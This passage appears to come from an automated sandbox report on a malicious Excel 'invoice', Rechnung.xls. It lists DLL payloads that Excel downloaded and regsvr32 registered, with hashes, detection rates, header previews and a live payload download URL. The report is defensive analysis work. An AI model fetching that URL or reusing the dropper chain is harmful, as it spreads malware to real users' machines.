                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dllmelimar.com.xlsGet hashmaliciousBrowse
                                          AGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dllmelimar.com.xlsGet hashmaliciousBrowse
                                              AGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dllmelimar.com.xlsGet hashmaliciousBrowse
                                                  AGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                    Download File
                                                    Process:C:\Windows\System32\regsvr32.exe
                                                    File Type:Microsoft Cabinet archive data, 61480 bytes, 1 file
                                                    Category:dropped
                                                    Size (bytes):61480
                                                    Entropy (8bit):7.9951219482618905
                                                    Encrypted:true
                                                    SSDEEP:1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
                                                    MD5:B9F21D8DB36E88831E5352BB82C438B3
                                                    SHA1:4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
                                                    SHA-256:998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
                                                    SHA-512:D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
                                                    Malicious:false
                                                    Preview:MSCF....(.......,...................I........y.........Tbr .authroot.stl..$..4..CK..<Tk...c_.d....A.K.....Y.f....!.))$7*I.....e..eKT..k....n.3.......S..9.s.....3H.Mh......qV.=M6.=.4.F.....V:F..]......B`....Q...c"U.0.n....J.....4.....i7s..:.27....._...+).lE..he.4|.?,...h....7..PA..b.,. .....#1+..o...g.....2n1m...=.......Dp.;..f..ljX.Dx..r<'.1RI3B0<w.D.z..)D|..8<..c+..'XH..K,.Y..d.j.<.A.......l_lVb[w..rDp...'.....nL....!G.F....f.fX..r.. ?.....v(...L..<.\.Z..g;.>.0v...P ......|...A..(..x...T0.`g...c..7.U?...9.p..a..&..9......sV..l0..D..fhi..h.F....q...y.....Mq].4..Z.....={L....AS..9.....:.:.........+..P.N....EAQ.V. sr.....y.B.`.Efe..8../....$...y-.q.J.......nP...2.Q8...O........M.@\.>=X....V..z.4.=.@...ws.N.M3.S.c?.....C4]?..\.K.9......^...CU......O....X.`........._.gU...*..V.{V6..m..D.-|.Q.t.7.....9.~....[...I.<e...~$..>......s.I.S....~1..IV.2Ri:..]R!8...q...l.X.%.)@......2.gb,t...}..;...@.Z..<q..y..:...e3..cY.we.$....z..| .#.......I...

                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                    Download File
                                                    Process:C:\Windows\System32\regsvr32.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):330
                                                    Entropy (8bit):3.126909434994818
                                                    Encrypted:false
                                                    SSDEEP:6:kKxBoJN+SkQlPlEGYRMY9z+4KlDA3RUesJ21:fkPlE99SNxAhUesE1
                                                    MD5:6A49FB2C22BA981051DEFE8A1CEE5715
                                                    SHA1:EC21B01F3DE5ADC1857D313D381E52ACFBA22FA5
                                                    SHA-256:8AEBAACDAC7A87C687A8329AF0CC184CBD7E8AACE965EA5970DEF774C71BEDDF
                                                    SHA-512:C282DA783959BA66746726F07E64250CD0B34CA6A4A403DE99C1E5B7635F54BEF65C6F0BB3B135177C2990E8A01D081764096A97458325D75F8BF9FE1F08699F
                                                    Malicious:false
                                                    Preview:p...... .........O..n..(....................................................... ........3k/"[......(...........(...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.3.3.6.b.2.f.2.2.5.b.d.8.1.:.0."...

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dll

                                                    Download File
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):365056
                                                    Entropy (8bit):7.158106334231925
                                                    Encrypted:false
                                                    SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTZA0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVO:i5MR9M6y3TjRIvgMSS3AyUrhYu3j
                                                    MD5:BE9AB3CBCD3C659212F266325283997D
                                                    SHA1:8AE66E545E3F39473BE65759BE466D48448F385C
                                                    SHA-256:278D0C0BAF0203C13A5E72F31027F4FD0921F6FA2A84656485D86F8D09D562C0
                                                    SHA-512:48058CE87D6A2813C60852B435BC43D7F64D0180A63F9F5964123C0009FC4060216749FBE32DF6FC60BC35E139E4B2D24320AEF526BF12A8A57473203B4F942D
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 56%
                                                    Joe Sandbox View:
                                                    • Filename: melimar.com.xls, Detection: malicious, Browse
                                                    • Filename: AGK-010522 MJEY-210522.xls, Detection: malicious, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dll

                                                    Download File
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):365056
                                                    Entropy (8bit):7.158099808823071
                                                    Encrypted:false
                                                    SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcT+0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TrRIvgMSS3AyUrhYu3j
                                                    MD5:F11EBAFE4C3C0069090023A6B4CAEC35
                                                    SHA1:3FECC4BC39FA6F17F062473D80F51AAEF8B442DB
                                                    SHA-256:CAE8D1C14C85D10D7413AF876E6748813AD6930CF4D856E120857C4489A690DA
                                                    SHA-512:425ED0A65526F11EADC37C8158C2D53C6A07C234DA59594DEEC8C8B132B6673534371A149CD5EA586ED07B0A517011E6143CE41E5D4D93608208C1DC73880F18
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 41%
                                                    Joe Sandbox View:
                                                    • Filename: melimar.com.xls, Detection: malicious, Browse
                                                    • Filename: AGK-010522 MJEY-210522.xls, Detection: malicious, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dll

                                                    Download File
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                    Category:downloaded
                                                    Size (bytes):365056
                                                    Entropy (8bit):7.158106332990621
                                                    Encrypted:false
                                                    SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTb0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TWRIvgMSS3AyUrhYu3j
                                                    MD5:8516983EEDC8690C1495B828B4262A63
                                                    SHA1:BDD250044234E53E9F08DB444A1DE00987735930
                                                    SHA-256:90498F1EE590DA28566434C15EFCFD98E829846F233387553EA655FC7559168D
                                                    SHA-512:C5B6A37A787A70E70BE8614F957C183547B85DFA0913B746F6BC701CEC09BD54E04FB53443DFEFFEDCF83176F581E6A5F4DE06219A1FA6D9D015691E9432CD93
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: Metadefender, Detection: 29%, Browse
                                                    • Antivirus: ReversingLabs, Detection: 59%
                                                    Joe Sandbox View:
                                                    • Filename: melimar.com.xls, Detection: malicious, Browse
                                                    • Filename: AGK-010522 MJEY-210522.xls, Detection: malicious, Browse
                                                    IE Cache URL:http://salledemode.com/tgroup.ge/x4bc2kL4BzGAeUsVi/
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lJWa95VlQ[1]

                                                    Download File
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):5
                                                    Entropy (8bit):1.5219280948873621
                                                    Encrypted:false
                                                    SSDEEP:3:hn:h
                                                    MD5:FDA44910DEB1A460BE4AC5D56D61D837
                                                    SHA1:F6D0C643351580307B2EAA6A7560E76965496BC7
                                                    SHA-256:933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
                                                    SHA-512:57DDA9AA7C29F960CD7948A4E4567844D3289FA729E9E388E7F4EDCBDF16BF6A94536598B4F9FF8942849F1F96BD3C00BC24A75E748A36FBF2A145F63BF904C1
                                                    Malicious:false
                                                    Preview:0....

                                                    C:\Users\user\AppData\Local\Temp\CabC624.tmp

                                                    Download File
                                                    Process:C:\Windows\System32\regsvr32.exe
                                                    File Type:Microsoft Cabinet archive data, 61480 bytes, 1 file
                                                    Category:dropped
                                                    Size (bytes):61480
                                                    Entropy (8bit):7.9951219482618905
                                                    Encrypted:true
                                                    SSDEEP:1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
                                                    MD5:B9F21D8DB36E88831E5352BB82C438B3
                                                    SHA1:4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
                                                    SHA-256:998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
                                                    SHA-512:D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
                                                    Malicious:false
                                                    Preview:MSCF....(.......,...................I........y.........Tbr .authroot.stl..$..4..CK..<Tk...c_.d....A.K.....Y.f....!.))$7*I.....e..eKT..k....n.3.......S..9.s.....3H.Mh......qV.=M6.=.4.F.....V:F..]......B`....Q...c"U.0.n....J.....4.....i7s..:.27....._...+).lE..he.4|.?,...h....7..PA..b.,. .....#1+..o...g.....2n1m...=.......Dp.;..f..ljX.Dx..r<'.1RI3B0<w.D.z..)D|..8<..c+..'XH..K,.Y..d.j.<.A.......l_lVb[w..rDp...'.....nL....!G.F....f.fX..r.. ?.....v(...L..<.\.Z..g;.>.0v...P ......|...A..(..x...T0.`g...c..7.U?...9.p..a..&..9......sV..l0..D..fhi..h.F....q...y.....Mq].4..Z.....={L....AS..9.....:.:.........+..P.N....EAQ.V. sr.....y.B.`.Efe..8../....$...y-.q.J.......nP...2.Q8...O........M.@\.>=X....V..z.4.=.@...ws.N.M3.S.c?.....C4]?..\.K.9......^...CU......O....X.`........._.gU...*..V.{V6..m..D.-|.Q.t.7.....9.~....[...I.<e...~$..>......s.I.S....~1..IV.2Ri:..]R!8...q...l.X.%.)@......2.gb,t...}..;...@.Z..<q..y..:...e3..cY.we.$....z..| .#.......I...

                                                    C:\Users\user\AppData\Local\Temp\TarC625.tmp

                                                    Download File
                                                    Process:C:\Windows\System32\regsvr32.exe
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):162196
                                                    Entropy (8bit):6.301436092020807
                                                    Encrypted:false
                                                    SSDEEP:1536:Nga6crtilgCyNY2Ip/5ib6NWdm1wpzru2RPZz04D8rlCMiB3XlMc:Na0imCy/dm0zru2RN97MiVGc
                                                    MD5:E721613517543768F0DE47A6EEEE3475
                                                    SHA1:3FFC13E3157CF6EB9E9CCAB57B9058209AF41D69
                                                    SHA-256:3163B82D1289693122EF99ED6C3C1911F68AA2A7296907CEBF84C897141CED4E
                                                    SHA-512:E097CAB58C5E390FDC2DB03A59329A548A60069804487828B70519A403622260E57F10B09D9DDAEEB3C31491FE32221FB67965C490771A3D42E45EBB8BE26587
                                                    Malicious:false
                                                    Preview:0..y...*.H.........y.0..yz...1.0...`.H.e......0..i...+.....7.....i.0..i.0...+.....7........SiU[v...220418211447Z0...+......0..i.0..D.....`...@.,..0..0.r1..*0...+.....7..h1......+h...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o

                                                    C:\Users\user\AppData\Local\Temp\~DF87842D0B1D415996.TMP

                                                    Download File
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):28672
                                                    Entropy (8bit):3.430046337073317
                                                    Encrypted:false
                                                    SSDEEP:768:ODRKpb8rGYrMPe3q7Q0XV5xtezE8vpI8UM+VB9s1X0:OVKpb8rGYrMPe3q7Q0XV5xtezE8vG8Uv
                                                    MD5:268EE6A4D8E511858C19684926C5CBC5
                                                    SHA1:4406095C22A6FA760F49845B116610756D3FFC01
                                                    SHA-256:C3C0646B3FDD86756340917F30A5B4F289095960870A82FBAD8D0033E5056C5E
                                                    SHA-512:526EDE142F8B98D56B21E4010018A83657232FA14EA69B53D5073D09E473FFD5E61639F6F53F42D2B4277CF35B9D806EEAFED619C725F2529516D012BFA778F2
                                                    Malicious:false
                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\Desktop\Rechnung.xls

                                                    Download File
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Dream, Last Saved By: TYHRETH, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Fri May 20 16:15:56 2022, Security: 0
                                                    Category:dropped
                                                    Size (bytes):69120
                                                    Entropy (8bit):6.450391718702606
                                                    Encrypted:false
                                                    SSDEEP:1536:gVKpb8rGYrMPe3q7Q0XV5xtezE8vG8UM+79s1a6YG2jzQ0viPvDNHhA6J:+Kpb8rGYrMPe3q7Q0XV5xtezE8vG8UMt
                                                    MD5:57D7E849761FABD6EE8346626D84F873
                                                    SHA1:F8CF67F4660EFA3FD9BACFAD41B834482AEA8287
                                                    SHA-256:D9A4982FAB4D1DCE466119FD8170D01AE649E9E23EB249ACE8A630D2A93E4F7F
                                                    SHA-512:5AE438A8E877CE5F310D4367AFE9281E9AFB9D3C1562B5ADE5D4D923F63835F7CC8E0C753665934EF6AE4ABBC9F7E2A56E428E07A0F5547811C7A6A6DBBC2047
                                                    Malicious:true
                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....userTH B.....a.........=.................................................=........Ve18.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......

                                                    C:\Users\user\uxevr1.ocx

                                                    Download File
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):365056
                                                    Entropy (8bit):7.158099808823071
                                                    Encrypted:false
                                                    SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcT+0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TrRIvgMSS3AyUrhYu3j
                                                    MD5:F11EBAFE4C3C0069090023A6B4CAEC35
                                                    SHA1:3FECC4BC39FA6F17F062473D80F51AAEF8B442DB
                                                    SHA-256:CAE8D1C14C85D10D7413AF876E6748813AD6930CF4D856E120857C4489A690DA
                                                    SHA-512:425ED0A65526F11EADC37C8158C2D53C6A07C234DA59594DEEC8C8B132B6673534371A149CD5EA586ED07B0A517011E6143CE41E5D4D93608208C1DC73880F18
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                                                    C:\Users\user\uxevr2.ocx

                                                    Download File
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):365056
                                                    Entropy (8bit):7.158106332990621
                                                    Encrypted:false
                                                    SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTb0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TWRIvgMSS3AyUrhYu3j
                                                    MD5:8516983EEDC8690C1495B828B4262A63
                                                    SHA1:BDD250044234E53E9F08DB444A1DE00987735930
                                                    SHA-256:90498F1EE590DA28566434C15EFCFD98E829846F233387553EA655FC7559168D
                                                    SHA-512:C5B6A37A787A70E70BE8614F957C183547B85DFA0913B746F6BC701CEC09BD54E04FB53443DFEFFEDCF83176F581E6A5F4DE06219A1FA6D9D015691E9432CD93
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                                                    C:\Users\user\uxevr3.ocx

                                                    Download File
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):365056
                                                    Entropy (8bit):7.158106334231925
                                                    Encrypted:false
                                                    SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTZA0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVO:i5MR9M6y3TjRIvgMSS3AyUrhYu3j
                                                    MD5:BE9AB3CBCD3C659212F266325283997D
                                                    SHA1:8AE66E545E3F39473BE65759BE466D48448F385C
                                                    SHA-256:278D0C0BAF0203C13A5E72F31027F4FD0921F6FA2A84656485D86F8D09D562C0
                                                    SHA-512:48058CE87D6A2813C60852B435BC43D7F64D0180A63F9F5964123C0009FC4060216749FBE32DF6FC60BC35E139E4B2D24320AEF526BF12A8A57473203B4F942D
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                                                    C:\Windows\System32\GistaKepWrpVA\oAaDhgd.dll (copy)

                                                    Download File
                                                    Process:C:\Windows\System32\regsvr32.exe
                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):365056
                                                    Entropy (8bit):7.158106334231925
                                                    Encrypted:false
                                                    SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTZA0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVO:i5MR9M6y3TjRIvgMSS3AyUrhYu3j
                                                    MD5:BE9AB3CBCD3C659212F266325283997D
                                                    SHA1:8AE66E545E3F39473BE65759BE466D48448F385C
                                                    SHA-256:278D0C0BAF0203C13A5E72F31027F4FD0921F6FA2A84656485D86F8D09D562C0
                                                    SHA-512:48058CE87D6A2813C60852B435BC43D7F64D0180A63F9F5964123C0009FC4060216749FBE32DF6FC60BC35E139E4B2D24320AEF526BF12A8A57473203B4F942D
                                                    Malicious:false
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                                                    C:\Windows\System32\ITAzDMJQNXvQb\pSYwk.dll (copy)

                                                    Download File
                                                    Process:C:\Windows\System32\regsvr32.exe
                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):365056
                                                    Entropy (8bit):7.158099808823071
                                                    Encrypted:false
                                                    SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcT+0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TrRIvgMSS3AyUrhYu3j
                                                    MD5:F11EBAFE4C3C0069090023A6B4CAEC35
                                                    SHA1:3FECC4BC39FA6F17F062473D80F51AAEF8B442DB
                                                    SHA-256:CAE8D1C14C85D10D7413AF876E6748813AD6930CF4D856E120857C4489A690DA
                                                    SHA-512:425ED0A65526F11EADC37C8158C2D53C6A07C234DA59594DEEC8C8B132B6673534371A149CD5EA586ED07B0A517011E6143CE41E5D4D93608208C1DC73880F18
                                                    Malicious:false
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                                                    C:\Windows\System32\MTAKuNEHAAsvRsb\hgVDSaDXChbCzdU.dll (copy)

                                                    Download File
                                                    Process:C:\Windows\System32\regsvr32.exe
                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):365056
                                                    Entropy (8bit):7.158106332990621
                                                    Encrypted:false
                                                    SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTb0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TWRIvgMSS3AyUrhYu3j
                                                    MD5:8516983EEDC8690C1495B828B4262A63
                                                    SHA1:BDD250044234E53E9F08DB444A1DE00987735930
                                                    SHA-256:90498F1EE590DA28566434C15EFCFD98E829846F233387553EA655FC7559168D
                                                    SHA-512:C5B6A37A787A70E70BE8614F957C183547B85DFA0913B746F6BC701CEC09BD54E04FB53443DFEFFEDCF83176F581E6A5F4DE06219A1FA6D9D015691E9432CD93
                                                    Malicious:false
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                                                    Static File Info

                                                    General

                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Dream, Last Saved By: TYHRETH, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Fri May 20 16:15:56 2022, Security: 0
                                                    Entropy (8bit):6.450200679340904
                                                    TrID:
                                                    • Microsoft Excel sheet (30009/1) 78.94%
                                                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                    File name:Rechnung.xls
                                                    File size:69138
                                                    MD5:9729363a5cdfee2598f93545b933043e
                                                    SHA1:be0c2937e23a7359a04366e9b27ccf1e3c32ee1f
                                                    SHA256:2b0db62c56ce0553d5ba8842a53d17ff5d0b66ad397c3b9565af1cfe48e19364
                                                    SHA512:5fdf316c01fc6460d48186f1670d80025621b4aa7d2fafee3b2929076c65834e17b5435e0457270048c5617e9945ec3ab4b4bfe921c538cf270d61485fb77a2a
                                                    SSDEEP:1536:nVKpb8rGYrMPe3q7Q0XV5xtezE8vG8UM+79s1a6YG2jzQ0viPvDNHhA6A:VKpb8rGYrMPe3q7Q0XV5xtezE8vG8UM0
                                                    TLSH:F9635A467A59C82DF914D33549D74BA97316FC318FAB0A833225F324AFFD8A05A0761B
                                                    File Content Preview:........................>......................................................................................................................................................................................................................................

                                                    File Icon

                                                    Icon Hash:e4eea286a4b4bcb4

                                                    Static OLE Info

                                                    General

                                                    Document Type:OLE
                                                    Number of OLE Files:1

                                                    OLE File "Rechnung.xls"

                                                    Indicators
                                                    Has Summary Info:
                                                    Application Name:Microsoft Excel
                                                    Encrypted Document:False
                                                    Contains Word Document Stream:False
                                                    Contains Workbook/Book Stream:True
                                                    Contains PowerPoint Document Stream:False
                                                    Contains Visio Document Stream:False
                                                    Contains ObjectPool Stream:False
                                                    Flash Objects Count:0
                                                    Contains VBA Macros:False
                                                    Summary
                                                    Code Page:1251
                                                    Author:Dream
                                                    Last Saved By:TYHRETH
                                                    Create Time:2015-06-05 18:19:34
                                                    Last Saved Time:2022-05-20 15:15:56
                                                    Creating Application:Microsoft Excel
                                                    Security:0
                                                    Document Summary
                                                    Document Code Page:1251
                                                    Thumbnail Scaling Desired:False
                                                    Company:
                                                    Contains Dirty Links:False
                                                    Shared Document:False
                                                    Changed Hyperlinks:False
                                                    Application Version:1048576

                                                    Streams

                                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                    General
                                                    Stream Path:\x5DocumentSummaryInformation
                                                    File Type:data
                                                    Stream Size:4096
                                                    Entropy:0.404258978601
                                                    Base64 Encoded:False
                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . E S R S G B 1 . . . . . E G S H R H V 2 . . . . . E S H V G R E R 3 . . . . . P K E K P P G
